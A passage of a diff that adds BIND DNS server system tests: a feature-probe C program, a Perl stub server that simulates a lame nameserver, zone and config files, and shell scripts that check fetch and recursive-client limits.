echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/feature-test.c b/bin/tests/system/feature-test.c new file mode 100644 index 0000000..e502ee9 --- /dev/null +++ b/bin/tests/system/feature-test.c @@ -0,0 +1,241 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <limits.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <unistd.h> + +#include <isc/md.h> +#include <isc/net.h> +#include <isc/print.h> +#include <isc/util.h> + +#include <dns/edns.h> + +#ifdef WIN32 +#include <Winsock2.h> +#endif /* ifdef WIN32 */ + +#ifndef _POSIX_HOST_NAME_MAX +#define _POSIX_HOST_NAME_MAX 255 +#endif + +static void +usage() { + fprintf(stderr, "usage: feature-test <arg>\n"); + fprintf(stderr, "args:\n"); + fprintf(stderr, "\t--edns-version\n"); + fprintf(stderr, "\t--enable-dnsrps\n"); + fprintf(stderr, "\t--enable-dnstap\n"); + fprintf(stderr, "\t--gethostname\n"); + fprintf(stderr, "\t--gssapi\n"); + fprintf(stderr, "\t--have-dlopen\n"); + fprintf(stderr, "\t--have-geoip2\n"); + fprintf(stderr, "\t--have-json-c\n"); + fprintf(stderr, "\t--have-libxml2\n"); + fprintf(stderr, "\t--ipv6only=no\n"); + fprintf(stderr, "\t--md5\n"); + fprintf(stderr, "\t--tsan\n"); + fprintf(stderr, "\t--with-dlz-filesystem\n"); + fprintf(stderr, "\t--with-idn\n"); + fprintf(stderr, "\t--with-lmdb\n"); + fprintf(stderr, "\t--with-zlib\n"); +} + +int +main(int argc, char **argv) { + if (argc != 2) { + usage(); + return (1); + } + + if (strcmp(argv[1], "--edns-version") == 0) { +#ifdef DNS_EDNS_VERSION + printf("%d\n", DNS_EDNS_VERSION); +#else /* ifdef DNS_EDNS_VERSION */ + printf("0\n"); +#endif /* ifdef DNS_EDNS_VERSION */ + return (0); + } + + if (strcmp(argv[1], "--enable-dnsrps") == 0) { +#ifdef USE_DNSRPS + return (0); +#else /* ifdef USE_DNSRPS */ + return (1); +#endif /* ifdef USE_DNSRPS */ + } + + if (strcmp(argv[1], "--enable-dnstap") == 0) { +#ifdef HAVE_DNSTAP + return (0); +#else /* ifdef HAVE_DNSTAP */ + return (1); +#endif /* ifdef HAVE_DNSTAP */ + } + + if (strcmp(argv[1], "--gethostname") == 0) { + char hostname[_POSIX_HOST_NAME_MAX + 1]; + int n; +#ifdef WIN32 + /* From InitSocket() */ + WORD wVersionRequested; + WSADATA wsaData; + int err; + + wVersionRequested = MAKEWORD(2, 0); + err = WSAStartup(wVersionRequested, &wsaData); + if (err != 0) { + fprintf(stderr, "WSAStartup() failed: %d\n", err); + exit(1); + } +#endif /* ifdef WIN32 */ + + n = gethostname(hostname, sizeof(hostname)); + if (n == -1) { + perror("gethostname"); + return (1); + } + fprintf(stdout, "%s\n", hostname); +#ifdef WIN32 + WSACleanup(); +#endif /* ifdef WIN32 */ + return (0); + } + + if (strcmp(argv[1], "--gssapi") == 0) { +#if defined(GSSAPI) + return (0); +#else /* if defined(GSSAPI) */ + return (1); +#endif /* if defined(GSSAPI) */ + } + + if (strcmp(argv[1], "--have-dlopen") == 0) { +#if defined(HAVE_DLOPEN) && defined(ISC_DLZ_DLOPEN) + return (0); +#else /* if defined(HAVE_DLOPEN) && defined(ISC_DLZ_DLOPEN) */ + return (1); +#endif /* if defined(HAVE_DLOPEN) && defined(ISC_DLZ_DLOPEN) */ + } + + if (strcmp(argv[1], "--have-geoip2") == 0) { +#ifdef HAVE_GEOIP2 + return (0); +#else /* ifdef HAVE_GEOIP2 */ + return (1); +#endif /* ifdef HAVE_GEOIP2 */ + } + + if (strcmp(argv[1], "--have-json-c") == 0) { +#ifdef HAVE_JSON_C + return (0); +#else /* ifdef HAVE_JSON_C */ + return (1); +#endif /* ifdef HAVE_JSON_C */ + } + + if (strcmp(argv[1], "--have-libxml2") == 0) { +#ifdef HAVE_LIBXML2 + return (0); +#else /* ifdef HAVE_LIBXML2 */ + return (1); +#endif /* ifdef HAVE_LIBXML2 */ + } + + if (strcmp(argv[1], "--ipv6only=no") == 0) { +#ifdef WIN32 + return (0); +#elif defined(IPPROTO_IPV6) && defined(IPV6_V6ONLY) + int s; + int n = -1; + int v6only = -1; + socklen_t len = sizeof(v6only); + + s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); + if (s >= 0) { + n = getsockopt(s, IPPROTO_IPV6, IPV6_V6ONLY, + (void *)&v6only, &len); + close(s); + } + return ((n == 0 && v6only == 0) ? 0 : 1); +#else /* ifdef WIN32 */ + return (1); +#endif /* ifdef WIN32 */ + } + + if (strcmp(argv[1], "--md5") == 0) { + unsigned char digest[ISC_MAX_MD_SIZE]; + const unsigned char test[] = "test"; + unsigned int size = sizeof(digest); + + if (isc_md(ISC_MD_MD5, test, sizeof(test), digest, &size) == + ISC_R_SUCCESS) + { + return (0); + } else { + return (1); + } + } + + if (strcmp(argv[1], "--tsan") == 0) { +#if defined(__has_feature) +#if __has_feature(thread_sanitizer) + return (0); +#endif +#endif +#if __SANITIZE_THREAD__ + return (0); +#else + return (1); +#endif + } + + if (strcmp(argv[1], "--with-dlz-filesystem") == 0) { +#ifdef DLZ_FILESYSTEM + return (0); +#else /* ifdef DLZ_FILESYSTEM */ + return (1); +#endif /* ifdef DLZ_FILESYSTEM */ + } + + if (strcmp(argv[1], "--with-idn") == 0) { +#ifdef HAVE_LIBIDN2 + return (0); +#else /* ifdef HAVE_LIBIDN2 */ + return (1); +#endif /* ifdef HAVE_LIBIDN2 */ + } + + if (strcmp(argv[1], "--with-lmdb") == 0) { +#ifdef HAVE_LMDB + return (0); +#else /* ifdef HAVE_LMDB */ + return (1); +#endif /* ifdef HAVE_LMDB */ + } + + if (strcmp(argv[1], "--with-zlib") == 0) { +#ifdef HAVE_ZLIB + return (0); +#else /* ifdef HAVE_ZLIB */ + return (1); +#endif /* ifdef HAVE_ZLIB */ + } + + fprintf(stderr, "unknown arg: %s\n", argv[1]); + usage(); + return (1); +} diff --git a/bin/tests/system/fetchlimit/ans4/ans.pl b/bin/tests/system/fetchlimit/ans4/ans.pl new file mode 100644 index 0000000..5a265c4 --- /dev/null +++ b/bin/tests/system/fetchlimit/ans4/ans.pl @@ -0,0 +1,86 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Don't respond if the "norespond" file exists; otherwise respond to +# any A or AAAA query. +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.4", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + my $donotrespond = 0; + + if (-e 'norespond') { + $donotrespond = 1; + } else { + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 A 192.0.2.1")); + } elsif ($qtype eq "AAAA") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 AAAA 2001:db8:beef::1")); + } + } + + if ($donotrespond == 0) { + $sock->send($packet->data); + print "RESPONSE:\n"; + $packet->print; + print "\n"; + } +} diff --git a/bin/tests/system/fetchlimit/clean.sh b/bin/tests/system/fetchlimit/clean.sh new file mode 100644 index 0000000..f0158b1 --- /dev/null +++ b/bin/tests/system/fetchlimit/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf */named.memstats */ans.run */named.recursing */named.run +rm -f dig.out* +rm -f ans4/norespond +rm -f ns3/named.stats ns3/named_dump.db +rm -f burst.input.* +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/fetchlimit/ns1/named.conf.in b/bin/tests/system/fetchlimit/ns1/named.conf.in new file mode 100644 index 0000000..9725d01 --- /dev/null +++ b/bin/tests/system/fetchlimit/ns1/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example.info." { + type primary; + file "example-info.db"; +}; diff --git a/bin/tests/system/fetchlimit/ns1/root.db b/bin/tests/system/fetchlimit/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/fetchlimit/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/fetchlimit/ns2/example.db b/bin/tests/system/fetchlimit/ns2/example.db new file mode 100644 index 0000000..5bf9999 --- /dev/null +++ b/bin/tests/system/fetchlimit/ns2/example.db @@ -0,0 +1,37 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example NS ns2.example. +ns2.example. A 10.53.0.2 + +a.example. A 10.0.0.1 + MX 10 mail.example. + +mail.example. A 10.0.0.2 + +lamesub.example. NS ns4.example. +ns4.example. A 10.53.0.4 + +0.example. A 10.53.1.0 +1.example. A 10.53.1.1 +2.example. A 10.53.1.2 +3.example. A 10.53.1.3 +4.example. A 10.53.1.4 +5.example. A 10.53.1.5 diff --git a/bin/tests/system/fetchlimit/ns2/named.conf.in b/bin/tests/system/fetchlimit/ns2/named.conf.in new file mode 100644 index 0000000..108877e --- /dev/null +++ b/bin/tests/system/fetchlimit/ns2/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "example" { + type primary; + file "example.db"; + allow-update { any; }; +}; diff --git a/bin/tests/system/fetchlimit/ns3/named.args b/bin/tests/system/fetchlimit/ns3/named.args new file mode 100644 index 0000000..6bd3e6c --- /dev/null +++ b/bin/tests/system/fetchlimit/ns3/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 1 -D fetchlimit-ns3 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/fetchlimit/ns3/named1.conf.in b/bin/tests/system/fetchlimit/ns3/named1.conf.in new file mode 100644 index 0000000..3adfe47 --- /dev/null +++ b/bin/tests/system/fetchlimit/ns3/named1.conf.in @@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; + fetches-per-server 400; +}; + +server 10.53.0.4 { + edns no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/fetchlimit/ns3/named2.conf.in b/bin/tests/system/fetchlimit/ns3/named2.conf.in new file mode 100644 index 0000000..74374b1 --- /dev/null +++ b/bin/tests/system/fetchlimit/ns3/named2.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; + fetches-per-zone 40; +}; + +server 10.53.0.4 { + edns no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/fetchlimit/ns3/named3.conf.in b/bin/tests/system/fetchlimit/ns3/named3.conf.in new file mode 100644 index 0000000..3df353b --- /dev/null +++ b/bin/tests/system/fetchlimit/ns3/named3.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; + recursive-clients 400; +}; + +server 10.53.0.4 { + edns no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/fetchlimit/ns3/root.hint b/bin/tests/system/fetchlimit/ns3/root.hint new file mode 100644 index 0000000..e0f186c --- /dev/null +++ b/bin/tests/system/fetchlimit/ns3/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.1 diff --git a/bin/tests/system/fetchlimit/prereq.sh b/bin/tests/system/fetchlimit/prereq.sh new file mode 100644 index 0000000..ec369f8 --- /dev/null +++ b/bin/tests/system/fetchlimit/prereq.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi diff --git a/bin/tests/system/fetchlimit/setup.sh b/bin/tests/system/fetchlimit/setup.sh new file mode 100644 index 0000000..7f5cbe7 --- /dev/null +++ b/bin/tests/system/fetchlimit/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf diff --git a/bin/tests/system/fetchlimit/tests.sh b/bin/tests/system/fetchlimit/tests.sh new file mode 100644 index 0000000..55f4bf6 --- /dev/null +++ b/bin/tests/system/fetchlimit/tests.sh @@ -0,0 +1,200 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGCMD="$DIG @10.53.0.3 -p ${PORT} +tcp +tries=1 +time=1" +RNDCCMD="$RNDC -p ${CONTROLPORT} -s 10.53.0.3 -c ../common/rndc.conf" + +burst() { + num=${3:-20} + rm -f burst.input.$$ + while [ $num -gt 0 ]; do + num=$((num-1)) + echo "${num}${1}${2}.lamesub.example A" >> burst.input.$$ + done + $PERL ../ditch.pl -p ${PORT} -s 10.53.0.3 burst.input.$$ + rm -f burst.input.$$ +} + +stat() { + clients=`$RNDCCMD status | grep "recursive clients" | + sed 's;.*: \([^/][^/]*\)/.*;\1;'` + echo_i "clients: $clients" + [ "$clients" = "" ] && return 1 + [ "$clients" -ge $1 ] || return 1 + [ "$clients" -le $2 ] || return 1 + return 0 +} + +status=0 + +echo_i "checking recursing clients are dropped at the per-server limit" +ret=0 +# make the server lame and restart +$RNDCCMD flush +touch ans4/norespond +for try in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + burst a $try + # fetches-per-server is at 400, but at 20qps against a lame server, + # we'll reach 200 at the tenth second, and the quota should have been + # tuned to less than that by then. + [ $try -le 5 ] && low=$((try*10)) + stat 20 200 || ret=1 + [ $ret -eq 1 ] && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "dumping ADB data" +$RNDCCMD dumpdb -adb +info=`grep '10.53.0.4' ns3/named_dump.db | sed 's/.*\(atr [.0-9]*\).*\(quota [0-9]*\).*/\1 \2/'` +echo_i $info +set -- $info +quota=$5 +[ ${5:-200} -lt 200 ] || ret=1 + +echo_i "checking servfail statistics" +ret=0 +rm -f ns3/named.stats +$RNDCCMD stats +for try in 1 2 3 4 5; do + [ -f ns3/named.stats ] && break + sleep 1 +done +sspill=`grep 'spilled due to server' ns3/named.stats | sed 's/\([0-9][0-9]*\) spilled.*/\1/'` +[ -z "$sspill" ] && sspill=0 +fails=`grep 'queries resulted in SERVFAIL' ns3/named.stats | sed 's/\([0-9][0-9]*\) queries.*/\1/'` +[ -z "$fails" ] && fails=0 +[ "$fails" -ge "$sspill" ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking lame server recovery" +ret=0 +rm -f ans4/norespond +for try in 1 2 3 4 5; do + burst b $try + stat 0 200 || ret=1 + [ $ret -eq 1 ] && break + sleep 1 +done + +echo_i "dumping ADB data" +$RNDCCMD dumpdb -adb +info=`grep '10.53.0.4' ns3/named_dump.db | sed 's/.*\(atr [.0-9]*\).*\(quota [0-9]*\).*/\1 \2/'` +echo_i $info +set -- $info +[ ${5:-${quota}} -lt $quota ] || ret=1 +quota=$5 + +for try in 1 2 3 4 5 6 7 8 9 10; do + burst c $try + stat 0 20 || ret=1 + [ $ret -eq 1 ] && break + sleep 1 +done + +echo_i "dumping ADB data" +$RNDCCMD dumpdb -adb +info=`grep '10.53.0.4' ns3/named_dump.db | sed 's/.*\(atr [.0-9]*\).*\(quota [0-9]*\).*/\1 \2/'` +echo_i $info +set -- $info +[ ${5:-${quota}} -gt $quota ] || ret=1 +quota=$5 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 + +echo_i "checking lame server clients are dropped at the per-domain limit" +ret=0 +fail=0 +success=0 +touch ans4/norespond +for try in 1 2 3 4 5; do + burst b $try 300 + $DIGCMD a ${try}.example > dig.out.ns3.$try + grep "status: NOERROR" dig.out.ns3.$try > /dev/null 2>&1 && \ + success=$((success+1)) + grep "status: SERVFAIL" dig.out.ns3.$try > /dev/null 2>&1 && \ + fail=$(($fail+1)) + stat 30 50 || ret=1 + [ $ret -eq 1 ] && break + $RNDCCMD recursing 2>&1 | sed 's/^/ns3 /' | cat_i + sleep 1 +done +echo_i "$success successful valid queries, $fail SERVFAIL" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking drop statistics" +rm -f ns3/named.stats +$RNDCCMD stats +for try in 1 2 3 4 5; do + [ -f ns3/named.stats ] && break + sleep 1 +done +zspill=`grep 'spilled due to zone' ns3/named.stats | sed 's/\([0-9][0-9]*\) spilled.*/\1/'` +[ -z "$zspill" ] && zspill=0 +drops=`grep 'queries dropped' ns3/named.stats | sed 's/\([0-9][0-9]*\) queries.*/\1/'` +[ -z "$drops" ] && drops=0 +[ "$drops" -ge "$zspill" ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +copy_setports ns3/named3.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 + +echo_i "checking lame server clients are dropped below the hard limit" +ret=0 +fail=0 +exceeded=0 +success=0 +touch ans4/norespond +for try in 1 2 3 4 5; do + burst b $try 400 + $DIGCMD +time=2 a ${try}.example > dig.out.ns3.$try + stat 100 400 || exceeded=$((exceeded + 1)) + grep "status: NOERROR" dig.out.ns3.$try > /dev/null 2>&1 && \ + success=$((success+1)) + grep "status: SERVFAIL" dig.out.ns3.$try > /dev/null 2>&1 && \ + fail=$(($fail+1)) + sleep 1 +done +echo_i "$success successful valid queries (expected 5)" +[ "$success" -eq 5 ] || { echo_i "failed"; ret=1; } +echo_i "$fail SERVFAIL responses (expected 0)" +[ "$fail" -eq 0 ] || { echo_i "failed"; ret=1; } +echo_i "clients count exceeded 400 on $exceeded trials (expected 0)" +[ "$exceeded" -eq 0 ] || { echo_i "failed"; ret=1; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking drop statistics" +rm -f ns3/named.stats +$RNDCCMD stats +for try in 1 2 3 4 5; do + [ -f ns3/named.stats ] && break + sleep 1 +done +drops=`grep 'queries dropped due to recursive client limit' ns3/named.stats | sed 's/\([0-9][0-9]*\) queries.*/\1/'` +[ "${drops:-0}" -ne 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/filter-aaaa/clean.sh b/bin/tests/system/filter-aaaa/clean.sh new file mode 100644 index 0000000..b7a2372 --- /dev/null +++ b/bin/tests/system/filter-aaaa/clean.sh @@ -0,0 +1,33 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns1/K* +rm -f ns1/*.signed +rm -f ns1/signer.err +rm -f ns1/dsset-* + +rm -f */named.run +rm -f */named.conf +rm -f */named.memstats + +rm -f ns4/K* +rm -f ns4/*.signed +rm -f ns4/signer.err +rm -f ns4/dsset-* + +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* + +rm -f ns*/trusted.conf +rm -f ns*/keygen.out diff --git a/bin/tests/system/filter-aaaa/conf/bad1.conf b/bin/tests/system/filter-aaaa/conf/bad1.conf new file mode 100644 index 0000000..01613fd --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad1.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { none; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/bad2.conf b/bin/tests/system/filter-aaaa/conf/bad2.conf new file mode 100644 index 0000000..e7a2d28 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad2.conf @@ -0,0 +1,26 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + /* + * While this matches the defaults, it is not a good configuration + * to have in named.conf as the two options contradict each other + * indicating a error on behalf of the operator. + * + * The default is to have filter-aaaa-on-v4 off, but if it is turned + * on then it applies to all IPv4 queries. This results in + * contradictory defaults. + */ + filter-aaaa-on-v4 no; + filter-aaaa { any; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/bad3.conf b/bin/tests/system/filter-aaaa/conf/bad3.conf new file mode 100644 index 0000000..88b4c7c --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad3.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT 